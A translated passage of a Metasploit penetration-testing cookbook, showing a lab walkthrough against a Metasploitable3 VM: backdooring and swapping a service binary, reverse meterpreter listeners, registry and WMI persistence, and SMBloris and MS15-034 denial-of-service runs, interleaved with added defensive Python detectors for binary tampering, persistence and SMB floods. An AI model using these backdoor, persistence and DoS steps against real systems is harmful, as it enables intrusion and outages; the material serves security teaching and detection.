Usage: generate [options]
Generates a payload.
OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce approproate NOPsled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -s <opt>  NOP sled length.
    -x <opt>  Specify a custom executable file to use as a template

4. Start a listener for the backdoor's reverse connection, using exploit -j to run it in the background.

msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:4444
msf5 exploit(multi/handler) >

5. Switch back to the previous meterpreter session, upload the backdoored file, and rename it.

msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > mv httpd.exe httpd.exe.backup
meterpreter > upload /root/httpd-backdoored.exe
[*] uploading  : /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] uploaded   : /root/httpd-backdoored.exe -> httpd-backdoored.exe
meterpreter > mv httpd-backdoored.exe httpd.exe
meterpreter >


6. Use the shell command to get a shell on the target system and restart the wampapache service.

meterpreter > shell
Process 1976 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.net sta
The wampapache service was stopped successfully.
C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache

[*] Sending stage (206403 bytes) to 192.168.177.144
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.


You will notice that once the service starts, new sessions come back.

C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
[*] Sending stage (206403 bytes) to 192.168.177.144
[*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
....
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
  4         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
  5         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)

msf5 exploit(multi/handler) >
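Step 5 replaces a service binary in place, and the meterpreter output shows the file growing from 21.00 KiB to 28.50 KiB. As an added example (not from the book or Metasploit), the Python below is the baseline-and-compare check a defender runs over service executables to catch exactly that change; the byte contents are constructed stand-ins sized to match the numbers above, and the paths are the ones shown in the session.

```python
"""Baseline-and-compare integrity check for service binaries.

Added example, not from the book. A hash baseline of service
executables, stored off the host, detects the in-place replacement
performed above. File contents here are constructed; only the sizes
(21504 and 29184 bytes) are taken from the session output.
"""
import hashlib
from typing import Dict, List, Tuple

Baseline = Dict[str, Tuple[str, int]]  # path -> (sha256, size)


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: Dict[str, bytes]) -> Baseline:
    """Record (sha256, size) for every path; keep the result somewhere the host cannot alter."""
    return {path: (sha256_of(data), len(data)) for path, data in files.items()}


def compare_to_baseline(baseline: Baseline, current: Dict[str, bytes]) -> List[str]:
    """Return findings: modified, missing, or unexpected binaries in the watched directory."""
    findings = []
    for path, (old_hash, old_size) in baseline.items():
        if path not in current:
            findings.append(f"MISSING {path}")
            continue
        new_hash, new_size = sha256_of(current[path]), len(current[path])
        if new_hash != old_hash:
            delta = new_size - old_size
            findings.append(f"MODIFIED {path}: size {old_size} -> {new_size} ({delta:+d} bytes)")
    for path in current:
        if path not in baseline:
            # A leftover like httpd.exe.backup is itself a clue that something was swapped.
            findings.append(f"UNEXPECTED {path}")
    return findings


# Constructed stand-ins: a fake 'original' binary and a copy with extra code appended.
ORIGINAL_HTTPD = b"MZ" + b"\x00" * 21502          # 21504 bytes = 21.00 KiB, as downloaded
BACKDOORED_HTTPD = ORIGINAL_HTTPD + b"\x90" * 7680  # 29184 bytes, the size generate wrote

HTTPD = r"C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe"
HTTPD_BACKUP = r"C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe.backup"

BASELINE = build_baseline({HTTPD: ORIGINAL_HTTPD})


def demo() -> List[str]:
    """State of the bin directory after step 5: swapped binary plus the renamed original."""
    return compare_to_baseline(BASELINE, {HTTPD: BACKDOORED_HTTPD, HTTPD_BACKUP: ORIGINAL_HTTPD})


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The size delta is reported alongside the hash mismatch because a template injection with -k keeps the original behaviour and only adds to the file, so a service binary that silently gained several kilobytes without a vendor update is worth a look even before the hash is compared.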

7. Plant a backdoor with the Windows registry persistence module. We use the session obtained from the EternalBlue attack for this.

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
msf5 exploit(windows/local/registry_persistence) > exploit

[*] Generating payload blob..
[+] Generated payload, 5944 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\cPH3pG4G
[+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
[*] Installing run key
[-] Exploit aborted due to failure: unknown: Could not install run key
msf5 exploit(windows/local/registry_persistence) >


Because of an environment problem, the backdoor was not installed successfully here.

8. If it succeeds, set up a listener so that a reverse shell session is obtained when the target reboots.

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:9999
msf5 exploit(multi/handler) >

9. When the target machine reboots, we get a session.

meterpreter > reboot
Rebooting...


10. Create a fileless backdoor with a WMI event subscription.

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 // set the callback interval to 1 minute
CALLBACK_INTERVAL => 60000
msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 // set the event ID
EVENT_ID_TRIGGER => 4624
msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator // set the user
USERNAME_TRIGGER => Administrator
msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
LPORT => 4433
msf5 exploit(windows/local/wmi_persistence) > exploit

[-] This module cannot run as System

11. The module reports that it cannot run as System. We can use migrate to move the meterpreter process into a relatively stable application's process.

msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                           Arch  Session  User                          Path
 ---   ----  ----                           ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                         x64   0
 232   4     smss.exe                       x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 300   472   svchost.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE
 316   304   csrss.exe                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 324   5624  explorer.exe                   x64   1        METASPLOITABLE3\vagrant       C:\Windows\Explorer.EXE
 .....
meterpreter > migrate -N explorer.exe // process migration does not succeed every time; try a few more times
[*] Migrating from 1088 to 5624...
[*] Migration completed successfully.
meterpreter >

Then run the exploit again.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/wmi_persistence) > exploit

[*] Installing Persistence...
[+]  - Bytes remaining: 12560
[+]  - Bytes remaining: 4560
[+] Payload successfully staged.
[+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
msf5 exploit(windows/local/wmi_persistence) >

Log the target machine out and log back in; msfconsole then receives the callback session.

[*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
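What the two persistence modules above leave on the host is a Run-key value plus a payload blob under a random registry key (registry_persistence), and a WMI __EventFilter / CommandLineEventConsumer / __FilterToConsumerBinding triple keyed to logon event 4624 (wmi_persistence). The following is an added example, not code from the book or from Metasploit, showing how a defender can hunt for both in Sysmon telemetry. The input records are constructed to resemble Sysmon Event ID 13 (registry value set) and Event IDs 19/20/21 (WMI filter, consumer and binding created); the field names follow Sysmon's schema (an assumption about the collector), and every value is made up, with the key names q3jhQYTs / cPH3pG4G only echoing the module output printed earlier.

```python
"""Hunt for Run-key and WMI event-subscription persistence in Sysmon-style events.

Added example; not code from the book or from the Metasploit modules above.
Records are constructed to resemble Sysmon Event ID 13 (RegistryEvent: value
set) and Event IDs 19/20/21 (WmiEvent: filter, consumer, binding). Field names
follow Sysmon's schema (assumption); all values are made up.
"""
import re

SAMPLE_EVENTS = [
    # Benign: a vendor installer registers its updater from Program Files.
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": r"C:\Program Files\Vendor\updater.exe /background"},
    # Suspicious: Run value that starts hidden, encoded PowerShell and points at a
    # random-looking registry key where a payload blob was stored (constructed).
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\q3jhQYTs",
     "Details": r"powershell.exe -nop -w hidden -enc <base64-placeholder> HKCU:\Software\cPH3pG4G"},
    # WMI filter that fires on logon event 4624 for a named user ...
    {"EventID": 19, "Operation": "Created", "Name": "Updater", "EventNamespace": r"root\cimv2",
     "Query": "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' "
              "AND TargetInstance.EventCode = '4624' AND TargetInstance.Message LIKE '%Administrator%'"},
    # ... a command-line consumer that launches PowerShell ...
    {"EventID": 20, "Operation": "Created", "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -enc <base64-placeholder>"},
    # ... and the binding that ties filter to consumer.
    {"EventID": 21, "Operation": "Created",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"', "Filter": '__EventFilter.Name="Updater"'},
    # Benign: a log-writing consumer with no binding (many products create these).
    {"EventID": 20, "Operation": "Created", "Name": "SCM Event Log Consumer", "Type": "Event Log",
     "Destination": ""},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Script hosts / LOLBins followed by switches and locations commonly seen in loaders.
SUSPICIOUS_CMD = re.compile(
    r"(powershell|pwsh|cmd\.exe|mshta|rundll32|regsvr32|wscript|cscript).*"
    r"(-enc|-nop|hidden|\\AppData\\|\\Temp\\|HKCU:|HKLM:|javascript:)",
    re.IGNORECASE)
# Filters keyed to logons, process starts or timers: the usual persistence triggers.
TRIGGER_CLASSES = re.compile(r"Win32_NTLogEvent|Win32_ProcessStartTrace|Win32_LocalTime|__TimerEvent",
                             re.IGNORECASE)
CODE_EXEC_CONSUMERS = ("CommandLineEventConsumer", "ActiveScriptEventConsumer")


def _name(ref):
    """Pull Updater out of 'CommandLineEventConsumer.Name="Updater"' (Sysmon binding syntax)."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref


def hunt_persistence(events):
    """Return (rule, subject) findings for the Sysmon-style event dicts given."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 13 and RUN_KEY.search(ev["TargetObject"]) and SUSPICIOUS_CMD.search(ev["Details"]):
            findings.append(("run_key_suspicious_command", ev["TargetObject"]))
        elif eid == 19 and ev["Operation"] == "Created" and TRIGGER_CLASSES.search(ev["Query"]):
            findings.append(("wmi_filter_on_logon_process_or_timer", ev["Name"]))
        elif eid == 20 and ev["Type"] in ("Command Line", "Active Script") \
                and SUSPICIOUS_CMD.search(ev["Destination"]):
            findings.append(("wmi_consumer_runs_script_host", ev["Name"]))
        elif eid == 21 and ev["Consumer"].startswith(CODE_EXEC_CONSUMERS):
            findings.append(("wmi_binding_to_code_exec_consumer",
                             f"{_name(ev['Filter'])} -> {_name(ev['Consumer'])}"))
    return findings


if __name__ == "__main__":
    for rule, subject in hunt_persistence(SAMPLE_EVENTS):
        print(f"[{rule}] {subject}")
```

On a live host the same records come from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=13,19,20,21}`; without Sysmon, the subscription itself can be enumerated with `Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding`. The binding rule is the one worth alerting on: a filter on Win32_NTLogEvent 4624 bound to a CommandLineEventConsumer is exactly why the text above has to log the Administrator out and back in before the session calls home.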

9. Denial of service attacks

A denial-of-service attack usually works by requesting a large amount of resources from the target or by exploiting a vulnerability, consuming the target machine's capacity. A DoS attack leaves legitimate users unable to access computer services or resources and may even crash the service or the operating system.

Getting ready

SMBloris is a Windows SMB vulnerability that has existed for 20 years. It can be used for denial-of-service (DoS) attacks and can bring down servers at scale. It affects all versions of the SMB protocol and every Windows version since Windows 2000.

How to do it

1. Before launching the SMBloris denial-of-service attack, first raise the attacking machine's maximum number of connections (the open-file descriptor limit).

root@osboxes:~# ulimit -n 65535
root@osboxes:~# ulimit -n
65535
root@osboxes:~#

2. Then use the smb_loris module to attack the target machine.

msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
RHOST => 192.168.177.144
msf5 auxiliary(dos/smb/smb_loris) > run

[*] Starting server...
[*] 192.168.177.144:445 - 100 socket(s) open
[*] 192.168.177.144:445 - 200 socket(s) open
[*] 192.168.177.144:445 - 300 socket(s) open
[*] 192.168.177.144:445 - 400 socket(s) open
[*] 192.168.177.144:445 - 500 socket(s) open
[*] 192.168.177.144:445 - 600 socket(s) open
[*] 192.168.177.144:445 - 700 socket(s) open
[*] 192.168.177.144:445 - 800 socket(s) open
[*] 192.168.177.144:445 - 900 socket(s) open
[*] 192.168.177.144:445 - 1000 socket(s) open
[!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
[*] 192.168.177.144:445 - 1017 socket(s) open
[*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open


3. Looking at the target machine, we can see that the large number of SMB requests sent by the attacker consumed a large amount of the target's memory. Each NBSS connection can allocate 128 KB of memory, so with a large number of connections memory can be exhausted, achieving denial of service.

Another nasty DoS attack is MS15-034, the HTTP protocol stack (HTTP.sys) request handling denial of service.

If a Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012 machine is running an IIS service vulnerable to MS15-034, the vulnerability can be used to crash the target server.
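Because SMBloris works by holding many NBSS connections open, each reserving the 128 KB quoted above, the host-side signal a defender can act on is an unusual number of concurrent TCP connections to port 445 from a single peer. The following is an added example, not code from the book or from Metasploit: it parses a `netstat -ano`-style connection table, counts established SMB connections per remote address and estimates the memory those connections tie up. The table is constructed inline; the 1017-connection figure mirrors the module output above, the other addresses are made up, and the alert threshold of 100 is an assumption to be tuned per environment.

```python
"""Spot an SMBloris-style connection flood from a netstat-style connection table.

Added example, not from the book or Metasploit. The connection lines are
constructed here in `netstat -ano` format; the 1017-connection peer mirrors the
module output above, the other addresses are made up.
"""
import re
from collections import Counter

KB = 1024
NBSS_BYTES_PER_CONN = 128 * KB   # per-connection allocation quoted in the text above
SMB_PORT = 445

# One `netstat -ano` row: Proto, local addr:port, remote addr:port, state, PID.
NETSTAT_LINE = re.compile(
    r"^\s*TCP\s+(?P<laddr>[\d.]+):(?P<lport>\d+)\s+(?P<raddr>[\d.]+):(?P<rport>\d+)\s+(?P<state>\S+)")


def build_sample_table():
    """Constructed netstat -ano output: one flooding peer plus a few normal clients."""
    lines = ["Active Connections", "",
             "  Proto  Local Address          Foreign Address        State           PID"]
    for i, peer in enumerate(["192.168.177.10", "192.168.177.11"]):      # normal file-share users
        lines.append(f"  TCP    192.168.177.144:445    {peer}:{50000 + i}    ESTABLISHED     4")
    for n in range(1017):                                                # the flooding peer
        lines.append(f"  TCP    192.168.177.144:445    192.168.177.143:{20000 + n}    ESTABLISHED     4")
    lines.append("  TCP    192.168.177.144:3389   192.168.177.10:50100   ESTABLISHED     1234")  # unrelated RDP
    lines.append("  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4")
    return lines


def smb_connections_by_peer(lines):
    """Count ESTABLISHED TCP connections to the local SMB port per remote address."""
    counts = Counter()
    for line in lines:
        m = NETSTAT_LINE.match(line)
        if m and int(m["lport"]) == SMB_PORT and m["state"] == "ESTABLISHED":
            counts[m["raddr"]] += 1
    return counts


def flag_flooders(counts, threshold=100):
    """Return {peer: (connections, estimated_bytes_held)} for peers above the threshold."""
    return {peer: (n, n * NBSS_BYTES_PER_CONN) for peer, n in counts.items() if n > threshold}


if __name__ == "__main__":
    counts = smb_connections_by_peer(build_sample_table())
    for peer, (n, held) in flag_flooders(counts).items():
        print(f"{peer}: {n} SMB connections, about {held // (KB * KB)} MiB of NBSS buffers held")
```

The per-peer count is the useful metric rather than the total, since a busy file server legitimately has hundreds of SMB sessions spread over many clients; the same grouping can be fed from `Get-NetTCPConnection -LocalPort 445 -State Established` on Windows. The practical mitigation is at the network edge: keep 445 off untrusted networks and cap connections per source there, because the memory is reserved before any authentication happens.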

msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >

As you can see, the target crashed with a blue screen.

Related online labs

Metasploit attacking a Linux target (lab)

Metasploit attacking a Windows Server 2008 target (lab)

Chapter 4: Meterpreter (preview)

In this chapter we will cover the following:

1. Understanding Meterpreter core commands

2. Understanding Meterpreter filesystem commands

3. Understanding Meterpreter networking commands

4. Understanding Meterpreter system commands

5. Setting up multiple communication channels with the target

6. Meterpreter anti-forensics

7. Screen and keystroke sniffing

8. Using the scraper Meterpreter script

9. Using winenum to enumerate system information

10. Automation scripts

11. Meterpreter resource scripts

12. Meterpreter timeout control

13. Meterpreter sleep control

14. Meterpreter transports

15. Registry manipulation

16. Loading framework plugins

17. API and Mixins

18. Railgun: turning Ruby into a weapon

19. Adding DLL and function definitions to Railgun

20. Hijacking remote VNC

21. Enabling remote desktop

Notes

Original book: Metasploit Penetration Testing Cookbook - Third Edition

www.packtpub.com/networking-…

This article was translated and compiled by Hetian Cyber Security Lab (合天網安實驗室); please credit the source when reprinting.

About Hetian Cyber Security Lab

Hetian Cyber Security Lab (www.hetianlab.com): a leading hands-on online cybersecurity education platform in China.

Real environments, hands-on online learning of cybersecurity; lab content covers system security, software security, network security, web security, mobile security, CTF, forensic analysis, penetration testing, and security awareness education.
